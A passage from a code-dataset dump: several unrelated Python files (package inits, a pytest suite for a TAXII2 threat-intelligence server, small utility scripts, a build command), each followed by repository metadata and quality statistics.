layout = Column(descr, grid)
tab = Panel(child = layout, title = "MSA/MCE")
return tab
| 33.016364 | 99 | 0.602952 | 2,672 | 18,159 | 3.863772 | 0.090943 | 0.046494 | 0.028477 | 0.04475 | 0.883088 | 0.80647 | 0.743801 | 0.730725 | 0.703991 | 0.695854 | 0 | 0.041572 | 0.270114 | 18,159 | 549 | 100 | 33.076503 | 0.737362 | 0.251996 | 0 | 0.572165 | 0 | 0 | 0.208423 | 0.026516 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046392 | false | 0 | 0.051546 | 0 | 0.14433 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a51cf503728e73233e5afd319a7cb124feb6665e | 296 | py | Python | vstreamer_utils/model/__init__.py | artudi54/video-streamer | 66e5e722ed66abe5877488f177c0ac4f13325382 | [
"MIT"
] | 2 | 2019-10-08T10:49:52.000Z | 2021-10-01T11:26:31.000Z | vstreamer_utils/model/__init__.py | artudi54/video-streamer | 66e5e722ed66abe5877488f177c0ac4f13325382 | [
"MIT"
] | 1 | 2019-05-16T13:48:29.000Z | 2019-05-16T13:48:49.000Z | vstreamer_utils/model/__init__.py | artudi54/video-streamer | 66e5e722ed66abe5877488f177c0ac4f13325382 | [
"MIT"
] | 1 | 2019-10-08T10:49:56.000Z | 2019-10-08T10:49:56.000Z | from vstreamer_utils.model.DirectoryInfo import DirectoryInfo
from vstreamer_utils.model.DirectoryTree import DirectoryTree
from vstreamer_utils.model.AdditionalEntryProperties import AdditionalEntryProperties
from vstreamer_utils.model.FileEntry import FileEntry, DirectoryEntry, VideoFileEntry
| 59.2 | 85 | 0.905405 | 30 | 296 | 8.8 | 0.366667 | 0.19697 | 0.272727 | 0.348485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060811 | 296 | 4 | 86 | 74 | 0.94964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb9ccd9a666b6a46b0924b351ef277b172f909f2 | 124 | py | Python | dist/Basilisk/fswAlgorithms/sunlineSuKF/__init__.py | ian-cooke/basilisk_mag | a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14 | [
"0BSD"
] | null | null | null | dist/Basilisk/fswAlgorithms/sunlineSuKF/__init__.py | ian-cooke/basilisk_mag | a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14 | [
"0BSD"
] | 1 | 2019-03-13T20:52:22.000Z | 2019-03-13T20:52:22.000Z | dist/Basilisk/fswAlgorithms/sunlineSuKF/__init__.py | ian-cooke/basilisk_mag | a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14 | [
"0BSD"
] | null | null | null | # This __init__.py file for the sunlineSuKF package is automatically generated by the build system
from sunlineSuKF import * | 62 | 98 | 0.830645 | 18 | 124 | 5.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145161 | 124 | 2 | 99 | 62 | 0.933962 | 0.774194 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cce79aeb715eff32807cc93c1a2d3aa8d98f8208 | 20,376 | py | Python | Packs/TAXIIServer/Integrations/TAXII2Server/TAXII2Server_test.py | cstone112/content | 7f039931b8cfc20e89df52d895440b7321149a0d | [
"MIT"
] | 2 | 2021-12-06T21:38:24.000Z | 2022-01-13T08:23:36.000Z | Packs/TAXIIServer/Integrations/TAXII2Server/TAXII2Server_test.py | cstone112/content | 7f039931b8cfc20e89df52d895440b7321149a0d | [
"MIT"
] | 87 | 2022-02-23T12:10:53.000Z | 2022-03-31T11:29:05.000Z | Packs/TAXIIServer/Integrations/TAXII2Server/TAXII2Server_test.py | cstone112/content | 7f039931b8cfc20e89df52d895440b7321149a0d | [
"MIT"
] | 2 | 2022-01-05T15:27:01.000Z | 2022-02-01T19:27:43.000Z | import copy
import io
import json
import pytest
from requests.auth import _basic_auth_str
from TAXII2Server import TAXII2Server, APP, uuid, create_fields_list
import demistomock as demisto
HEADERS = {
'Authorization': _basic_auth_str("username", "password"),
'Accept': '*/*',
}
@pytest.fixture
def taxii2_server_v20(mocker):
mocker.patch.object(demisto, 'getLicenseID', return_value='test')
server = TAXII2Server(url_scheme='http',
host='demisto',
port=7000,
collections={'Collection1': 'type:IP', 'Collection2': 'sourceBrands:"Some Feed"'},
certificate='',
private_key='',
http_server=True,
credentials={'identifier': 'username',
'password': 'password'},
version='2.0',
service_address=None,
fields_to_present=set())
return server
@pytest.fixture
def taxii2_server_v21(mocker):
mocker.patch.object(demisto, 'getLicenseID', return_value='test')
server = TAXII2Server(url_scheme='http',
host='demisto',
port=7000,
collections={'Collection1': 'type:IP', 'Collection2': {'query': 'sourceBrands:"Some Feed"',
'description': 'Test desc'}},
certificate='',
private_key='',
http_server=True,
credentials={'identifier': 'username',
'password': 'password'},
version='2.1',
service_address=None,
fields_to_present=set())
return server
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
@pytest.mark.parametrize('fields, result', [("", {'name', 'type'}), ('all', set()),
('name,type,sha1', {'name', 'type', 'sha1'}),
('value,type,sha1', {'name', 'type', 'sha1'}),
('value,indicator_type,createdTime', {'name', 'type', 'createdTime'})])
def test_create_fields_list(fields, result):
"""
Given
fields list parameter, expected result
When
User enters filter_field param
Then
Validate right result returned
"""
assert result == create_fields_list(fields)
@pytest.mark.parametrize('headers', [{'Authorization': _basic_auth_str("user", "pwd")}, {}])
def test_taxii_wrong_auth(mocker, headers, taxii2_server_v20):
"""
Given
Taxii server v2.0
When
Getting server discovery, with wrong auth
Then
Validate that the error and status code right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=headers)
assert response.status_code == 401
assert response.json == {'title': 'Authorization failed'}
@pytest.mark.parametrize('headers', [{'Authorization': _basic_auth_str("username", "password")},
{'Authorization': _basic_auth_str("username", "password"),
'Accept': 'wrong_type'}])
def test_taxii_wrong_accept(mocker, headers, taxii2_server_v20):
"""
Given
Taxii server v2.0
When
Getting server discovery, with wrong accept header
Then
Validate that the error and status code right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=headers)
assert response.status_code == 406
def test_taxii20_server_discovery(mocker, taxii2_server_v20):
"""
Given
Taxii server v2.0
When
Getting server discovery
Then
Validate that the discovery output as expected
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json.get('default') == 'http://demisto:7000/threatintel/'
def test_taxii21_server_discovery(mocker, taxii2_server_v21):
"""
Given
Taxii server v2.1
When
Call server discovery api request
Then
Validate that the discovery output as expected
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
with APP.test_client() as test_client:
response = test_client.get('/taxii/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json.get('default') == 'http://demisto:7000/threatintel/'
def test_taxii20_api_root(mocker, taxii2_server_v20):
"""
Given
TAXII v2.0 server, api_root
When
Call api_root api request
Then
Validate that the api_root information returned as expected
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json.get('title') == 'Cortex XSOAR TAXII2 Server ThreatIntel'
def test_taxii_wrong_api_root(mocker, taxii2_server_v20):
"""
Given
Taxii server v2.0, Not exiting api_root
When
Getting api root information, for wrong api_root
Then
Validate that the error and status code right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/not_exsisting_api_root/', headers=HEADERS)
assert response.status_code == 404
assert response.json.get('title') == 'Unknown API Root'
def test_taxii20_status(mocker, taxii2_server_v20):
"""
Given
Status api call
When
Calling a status request
Then
Validate the error returned.
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/status/1223456/', headers=HEADERS)
assert response.status_code == 404
def test_taxii20_collections(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0
When
Calling collections api request
Then
Validate that collections returned as expected
"""
collections = util_load_json('test_files/collections20.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json == collections
def test_taxii21_collections(mocker, taxii2_server_v21):
"""
Given
TAXII Server v2.1
When
Calling collections api request
Then
Validate that collections returned as expected
"""
collections = util_load_json('test_files/collections21.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == collections
def test_taxii20_collection(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id
When
Calling collection by id api request
Then
Validate that right collection returned
"""
collections = util_load_json('test_files/collections20.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json == collections.get('collections')[0]
def test_taxii21_collection(mocker, taxii2_server_v21):
"""
Given
TAXII Server v2.1, collection_id
When
Calling collection by id api request
Then
Validate that right collection returned
"""
collections = util_load_json('test_files/collections21.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == collections.get('collections')[0]
def test_taxii_wrong_collection_id(mocker, taxii2_server_v21):
"""
Given
Taxii server v2.1, Not exiting collection_id
When
Getting collection information, for wrong collection_id
Then
Validate that the error and status code right
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/not_exsisting_collection_id/', headers=HEADERS)
assert response.status_code == 404
assert response.json.get('title') == 'Unknown Collection'
def test_taxii20_manifest(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id, range
When
Calling manifest api request for given collection
Then
Validate that right manifest returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
manifest = util_load_json('test_files/manifest20.json')
headers = copy.deepcopy(HEADERS)
headers['Range'] = 'items 0-4'
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/manifest/',
headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.taxii+json; version=2.0'
assert response.json == manifest
def test_taxii21_manifest(mocker, taxii2_server_v21):
"""
Given
TAXII Server v2.1, collection_id
When
Calling manifest api request for given collection
Then
Validate that right manifest returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
manifest = util_load_json('test_files/manifest21.json')
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/manifest/?limit=4',
headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == manifest
def test_taxii20_objects(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id, content-range
When
Calling get objects api request for given collection
Then
Validate that right objects are returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
objects = util_load_json('test_files/objects20.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
headers = copy.deepcopy(HEADERS)
headers['Content-Range'] = 'items 0-2/5'
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/objects/',
headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.stix+json; version=2.0'
assert response.json == objects
assert response.headers.get('Content-Range') == 'items 0-2/5'
def test_taxii20_indicators_objects(mocker, taxii2_server_v20):
"""
Given
TAXII Server v2.0, collection_id, content-range, types_for_indicator_sdo
When
Calling get objects api request for given collection
Then
Validate that right objects are returned.
"""
iocs = util_load_json('test_files/ip_iocs.json')
objects = util_load_json('test_files/objects20-indicators.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch('TAXII2Server.SERVER.types_for_indicator_sdo', [
'ipv4-addr', 'domain-name', 'ipv6-addr', 'user-account',
'email-addr', 'windows-registry-key', 'file', 'url'])
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
headers = copy.deepcopy(HEADERS)
headers['Content-Range'] = 'items 0-2/5'
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/4c649e16-2bb7-50f5-8826-2a2d0a0b9631/objects/',
headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/vnd.oasis.stix+json; version=2.0'
assert response.json == objects
assert response.headers.get('Content-Range') == 'items 0-2/5'
@pytest.mark.parametrize('demisto_iocs_file,res_file,query_type', [
('malware_iocs', 'objects21_malware', 'malware'),
('file_iocs', 'objects21_file', 'file'),
('domain_iocs', 'objects21_domain', 'domain-name,attack-pattern')
])
def test_taxii21_objects(mocker, taxii2_server_v21, demisto_iocs_file, res_file, query_type):
"""
Given
TAXII Server v2.1, collection_id, limit, next, type parameter
When
Calling get objects api request for given collection
Then
Validate that right objects are returned.
"""
iocs = util_load_json(f'test_files/{demisto_iocs_file}.json')
objects = util_load_json(f'test_files/{res_file}.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
f'objects/?match[type]={query_type}&limit=2&next=1', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == objects
@pytest.mark.parametrize('api_request', [
'objects', 'manifest'
])
def test_taxii21_bad_request(mocker, taxii2_server_v21, api_request):
"""
Given
TAXII Server v2.1, non-supported filter.
When
Calling get objects or manifest api request for given collection
Then
Validate that right error returned.
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch.object(demisto, 'error')
mocker.patch.object(demisto, 'params', return_value={'res_size': '2500'})
mocker.patch.object(demisto, 'updateModuleHealth')
with APP.test_client() as test_client:
response = test_client.get(f'/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
f'{api_request}/?match[version]=3', headers=HEADERS)
assert response.status_code == 404
assert response.content_type == 'application/taxii+json;version=2.1'
assert 'Filtering by ID or version is not supported.' in response.json.get('description')
@pytest.mark.parametrize('api_request', [
'objects', 'manifest'
])
def test_taxii20_bad_content_range(mocker, taxii2_server_v20, api_request):
"""
Given
TAXII Server v2.0, non-supported range.
When
Calling get objects or manifest api request for given collection
Then
Validate that right error returned.
"""
mocker.patch('TAXII2Server.SERVER', taxii2_server_v20)
mocker.patch.object(demisto, 'params', return_value={'res_size': '2500'})
headers = copy.deepcopy(HEADERS)
headers['Content-Range'] = 'items 8-2/10'
with APP.test_client() as test_client:
response = test_client.get(f'/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
f'{api_request}/', headers=headers)
assert response.status_code == 416
@pytest.mark.parametrize('res_file,fields,has_extension', [
('objects21_no_extention_file', {'name', 'type'}, False),
('objects21_spec_fields_file', {'sha1'}, True)])
def test_taxii21_objects_filtered_params(mocker, taxii2_server_v21, res_file, fields, has_extension):
"""
Given
TAXII Server v2.1, collection_id, type parameter, filtered_fields params
When
Calling get objects api request for given collection
Then
Validate that right objects are returned.
"""
iocs = util_load_json('test_files/file_iocs.json')
objects = util_load_json(f'test_files/{res_file}.json')
mocker.patch('TAXII2Server.SERVER', taxii2_server_v21)
mocker.patch('TAXII2Server.SERVER.fields_to_present', fields)
mocker.patch('TAXII2Server.SERVER.has_extension', has_extension)
mocker.patch.object(uuid, 'uuid4', return_value='1ffe4bee-95e7-4e36-9a17-f56dbab3c777')
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch.object(demisto, 'params', return_value={'res_size': '100'})
with APP.test_client() as test_client:
response = test_client.get('/threatintel/collections/e46189b5-c5c8-5c7f-b947-183e0302b4d3/'
'objects/?match[type]=file', headers=HEADERS)
assert response.status_code == 200
assert response.content_type == 'application/taxii+json;version=2.1'
assert response.json == objects
| 41.668712 | 117 | 0.644533 | 2,313 | 20,376 | 5.496325 | 0.099006 | 0.047196 | 0.040116 | 0.049084 | 0.825926 | 0.809644 | 0.790687 | 0.768505 | 0.750177 | 0.720286 | 0 | 0.047262 | 0.247154 | 20,376 | 488 | 118 | 41.754098 | 0.781486 | 0.154495 | 0 | 0.665428 | 0 | 0 | 0.268014 | 0.141043 | 0 | 0 | 0 | 0 | 0.200743 | 1 | 0.089219 | false | 0.018587 | 0.026022 | 0 | 0.126394 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
692eb57dcafc0a16c104284304110e2f667e9b10 | 190 | py | Python | tests/test_fallback_or.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 123 | 2018-07-31T19:17:27.000Z | 2022-03-18T15:29:07.000Z | tests/test_fallback_or.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 11 | 2019-05-01T18:01:59.000Z | 2022-01-01T06:43:36.000Z | tests/test_fallback_or.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 4 | 2019-06-07T12:03:53.000Z | 2021-05-10T20:29:44.000Z | from sspipe import p, px
def test_divide_fallback():
assert (dict(x=2, y=3).keys() / p(list) | p(set)) == {'x', 'y'}
assert (dict(x=2, y=3).values() / p(list) | p(set)) == {2, 3}
| 23.75 | 67 | 0.536842 | 35 | 190 | 2.857143 | 0.542857 | 0.2 | 0.22 | 0.24 | 0.28 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0.039474 | 0.2 | 190 | 7 | 68 | 27.142857 | 0.618421 | 0 | 0 | 0 | 0 | 0 | 0.010582 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
15ea0c269d04ce2d0aaa7011c55b213bb7f08492 | 187 | py | Python | examples/AMDAutomation/dev/dev-tools/generate.py | YuudachiXMMY/BenchmarkAutomation | 36c6899e5dfc4e4a0a186ee28d6cbbda1a08c9e6 | [
"MIT"
] | 1 | 2021-07-09T01:48:01.000Z | 2021-07-09T01:48:01.000Z | examples/AMDAutomation/dev/dev-tools/generate.py | YuudachiXMMY/BenchmarkAutomation | 36c6899e5dfc4e4a0a186ee28d6cbbda1a08c9e6 | [
"MIT"
] | null | null | null | examples/AMDAutomation/dev/dev-tools/generate.py | YuudachiXMMY/BenchmarkAutomation | 36c6899e5dfc4e4a0a186ee28d6cbbda1a08c9e6 | [
"MIT"
] | 1 | 2021-07-26T07:16:34.000Z | 2021-07-26T07:16:34.000Z | pyinstaller --distpath="./build/release" --workpath="./build/release" --specpath="./build/release" -i="C:\Users\Navi\Desktop\BMAutomation\examples\AMDAutomation\dev\Huskies.ico" -F app.py | 187 | 187 | 0.754011 | 24 | 187 | 5.875 | 0.833333 | 0.255319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032086 | 187 | 1 | 187 | 187 | 0.779006 | 0 | 0 | 0 | 0 | 0 | 0.62766 | 0.388298 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
15fecc07ea8578d97403ad0b497aea18afc81f64 | 118 | py | Python | tests/integration/constants.py | bk521234/fables | 6e3d461c597610ae2e954a0d30869e1e962d69a4 | [
"Apache-2.0"
] | null | null | null | tests/integration/constants.py | bk521234/fables | 6e3d461c597610ae2e954a0d30869e1e962d69a4 | [
"Apache-2.0"
] | null | null | null | tests/integration/constants.py | bk521234/fables | 6e3d461c597610ae2e954a0d30869e1e962d69a4 | [
"Apache-2.0"
] | null | null | null | import os
DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
HRIS_DATA_DIR = os.path.join(DATA_DIR, "hris")
| 19.666667 | 58 | 0.728814 | 21 | 118 | 3.714286 | 0.428571 | 0.269231 | 0.230769 | 0.333333 | 0.435897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 118 | 5 | 59 | 23.6 | 0.735849 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c6070e0ea6872e4bb09c03c92f625e6eb1017614 | 82 | py | Python | lightning_plus/api_basebone/restful/relation/__init__.py | twocucao/lightning-plus | e69c81da9c15fdfc37355e0362ff7ed804e94b2a | [
"MIT"
] | 1 | 2021-04-15T14:52:12.000Z | 2021-04-15T14:52:12.000Z | lightning_plus/api_basebone/restful/relation/__init__.py | twocucao/lightning | e69c81da9c15fdfc37355e0362ff7ed804e94b2a | [
"MIT"
] | null | null | null | lightning_plus/api_basebone/restful/relation/__init__.py | twocucao/lightning | e69c81da9c15fdfc37355e0362ff7ed804e94b2a | [
"MIT"
] | null | null | null | from .reverse_m2m import reverse_many_to_many
__all__ = ["reverse_many_to_many"]
| 20.5 | 45 | 0.829268 | 13 | 82 | 4.384615 | 0.538462 | 0.385965 | 0.45614 | 0.596491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013514 | 0.097561 | 82 | 3 | 46 | 27.333333 | 0.756757 | 0 | 0 | 0 | 0 | 0 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c6426cad430c9e0d4d1a54210e489568bbfbde30 | 30 | py | Python | code/main.py | ramonduarte/ellectoral-college-br | ca3e74e5d63deb8f9344d31eb6f65283cb4c5f2f | [
"MIT"
] | null | null | null | code/main.py | ramonduarte/ellectoral-college-br | ca3e74e5d63deb8f9344d31eb6f65283cb4c5f2f | [
"MIT"
] | null | null | null | code/main.py | ramonduarte/ellectoral-college-br | ca3e74e5d63deb8f9344d31eb6f65283cb4c5f2f | [
"MIT"
] | null | null | null | import pandas as pd
print(pd) | 10 | 19 | 0.766667 | 6 | 30 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 30 | 3 | 20 | 10 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
c64ecfc572c10bdeb11c445aa2900c30706859d6 | 43 | py | Python | src/packagescripts/python_arrow_version.py | davidanthoff/csv-comparison | 44e7c665e83d9832bb879c70d9068bbb5a870539 | [
"MIT"
] | 10 | 2018-10-17T01:58:30.000Z | 2021-11-16T12:31:28.000Z | src/packagescripts/python_arrow_version.py | davidanthoff/csv-comparison | 44e7c665e83d9832bb879c70d9068bbb5a870539 | [
"MIT"
] | 5 | 2018-10-17T05:19:37.000Z | 2020-07-05T03:30:44.000Z | src/packagescripts/python_arrow_version.py | davidanthoff/csv-comparison | 44e7c665e83d9832bb879c70d9068bbb5a870539 | [
"MIT"
] | 3 | 2018-10-23T23:17:15.000Z | 2021-12-28T23:51:14.000Z | import pyarrow
print(pyarrow.__version__)
| 10.75 | 26 | 0.837209 | 5 | 43 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 3 | 27 | 14.333333 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
d694667f3f664fce6a80852d14e415852f04be99 | 30,028 | py | Python | tests/test_miningpoolhub_py.py | CoryKrol/miningpoolhub_py | ebbaa886584718329b58a6249bc2c02cda59faa1 | [
"Apache-2.0"
] | null | null | null | tests/test_miningpoolhub_py.py | CoryKrol/miningpoolhub_py | ebbaa886584718329b58a6249bc2c02cda59faa1 | [
"Apache-2.0"
] | null | null | null | tests/test_miningpoolhub_py.py | CoryKrol/miningpoolhub_py | ebbaa886584718329b58a6249bc2c02cda59faa1 | [
"Apache-2.0"
] | null | null | null | import aiohttp
import json
from miningpoolhub_py.exceptions import (
APIError,
APIRateLimitError,
InvalidCoinError,
UnauthorizedError,
)
from miningpoolhub_py import MiningPoolHubAPI
import pytest
from aioresponses import aioresponses
NOT_ALL_KEYS_PRESENT = "All keys should be in the response"
